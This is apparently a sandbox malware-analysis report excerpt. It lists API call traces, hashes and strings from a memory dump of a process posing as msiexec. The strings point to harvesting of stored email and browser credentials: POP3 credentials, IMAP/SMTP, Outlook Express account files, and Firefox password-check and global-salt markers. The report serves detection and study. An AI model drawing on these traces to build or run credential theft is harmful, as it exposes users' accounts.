                                                    • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                    • String ID: %s@gmail.com
                                                    • API String ID: 3261640601-4097000612
                                                    • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                    • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                    APIs
                                                    • memset.MSVCRT ref: 004094C8
                                                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                    • memset.MSVCRT ref: 0040950C
                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                    • _strcmpi.MSVCRT ref: 00409531
                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                    • String ID: sysdatetimepick32
                                                    • API String ID: 3411445237-4169760276
                                                    • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                    • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                    APIs
                                                    • memset.MSVCRT ref: 00403504
                                                    • memset.MSVCRT ref: 0040351A
                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                    • _mbscat.MSVCRT ref: 0040356D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _mbscatmemset$_mbscpystrlen
                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                    • API String ID: 632640181-966475738
                                                    • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                    • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                    APIs
                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                    • GetSysColor.USER32(0000000F), ref: 0040B472
                                                    • DeleteObject.GDI32(?), ref: 0040B4A6
                                                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                    • String ID:
                                                    • API String ID: 3642520215-0
                                                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                    APIs
                                                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                    • GetDC.USER32(00000000), ref: 004072FB
                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                    • String ID:
                                                    • API String ID: 1999381814-0
                                                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpymemset
                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                    • API String ID: 1297977491-3883738016
                                                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                    APIs
                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                    • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                    • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memset
                                                    • String ID: gj
                                                    • API String ID: 438689982-4203073231
                                                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm$__aullrem
                                                    • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                    • API String ID: 643879872-978417875
                                                    • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                    • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                    • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                    • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                    APIs
                                                    • memset.MSVCRT ref: 0040810E
                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,68207B60,?), ref: 004081B9
                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                    • API String ID: 524865279-2190619648
                                                    • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                    • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                    • String ID: 0$6
                                                    • API String ID: 2300387033-3849865405
                                                    • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                    • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                    APIs
                                                    • memset.MSVCRT ref: 004076D7
                                                    • sprintf.MSVCRT ref: 00407704
                                                    • strlen.MSVCRT ref: 00407710
                                                    • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                    • strlen.MSVCRT ref: 00407733
                                                    • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpystrlen$memsetsprintf
                                                    • String ID: %s (%s)
                                                    • API String ID: 3756086014-1363028141
                                                    • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                    • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                    APIs
                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                    • OpenClipboard.USER32(?), ref: 0040C1B1
                                                    • GetLastError.KERNEL32 ref: 0040C1CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                    • String ID: pw h
                                                    • API String ID: 1189762176-3442003101
                                                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _mbscat$memsetsprintf
                                                    • String ID: %2.2X
                                                    • API String ID: 125969286-791839006
                                                    • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                    • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                    APIs
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                    • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                      • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                    • CloseHandle.KERNEL32(?), ref: 00444206
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                    • String ID: ACD
                                                    • API String ID: 82305771-620537770
                                                    • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                    • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                    APIs
                                                    • memset.MSVCRT ref: 004091EC
                                                    • sprintf.MSVCRT ref: 00409201
                                                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                      • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                    • SetWindowTextA.USER32(?,?), ref: 00409228
                                                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                    • String ID: caption$dialog_%d
                                                    • API String ID: 2923679083-4161923789
                                                    • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                    • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                    • memset.MSVCRT ref: 00410246
                                                    • memset.MSVCRT ref: 00410258
                                                      • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                    • memset.MSVCRT ref: 0041033F
                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                    • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                    • String ID:
                                                    • API String ID: 3974772901-0
                                                    • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                    • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                    APIs
                                                    • wcslen.MSVCRT ref: 0044406C
                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                    • strlen.MSVCRT ref: 004440D1
                                                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                    • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                    • String ID:
                                                    • API String ID: 577244452-0
                                                    • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                    • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                    APIs
                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                    • _strcmpi.MSVCRT ref: 00404518
                                                    • _strcmpi.MSVCRT ref: 00404536
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _strcmpi$memcpystrlen
                                                    • String ID: imap$pop3$smtp
                                                    • API String ID: 2025310588-821077329
                                                    • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                    • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                    APIs
                                                    • memset.MSVCRT ref: 0040C02D
                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                      • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                    • API String ID: 2726666094-3614832568
                                                    • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                    • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                    APIs
                                                    • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                      • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                    • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                    • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                    • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2030264292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcmp$memcpy
                                                    • String ID: global-salt$password-check
                                                    • API String ID: 231171946-3927197501
